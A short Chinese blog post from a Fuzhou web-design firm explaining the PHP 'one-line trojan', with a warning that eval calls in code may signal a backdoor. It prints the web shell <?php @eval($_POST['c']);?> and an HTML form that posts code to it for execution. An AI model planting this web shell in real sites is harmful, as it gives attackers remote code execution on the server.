結合設計經驗與營銷實踐,提供有價值的互聯網資訊
發布日期:2017-03-19瀏覽次數:1292 來源:福州網站建設
eval可以用來執行任何其他php代碼,所以對于代碼里發現了eval函數一定要小心,可能是木馬
就這一句話害死人,這樣任何人都可以post任何文件上來,所以要做好防范
|
1
|
<?php @eval($_POST['c']);?> |
使用方法也很簡單,本地提交文件指向提交文件,里面的php代碼就會被執行
|
1
2
3
4
5
6
7
8
|
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html> |
以上是由福州網站建設的小編為你分享了"php一句話木馬eval函數"文章,如果你在這方面有什么問題,隨時聯系我們
微信便捷交流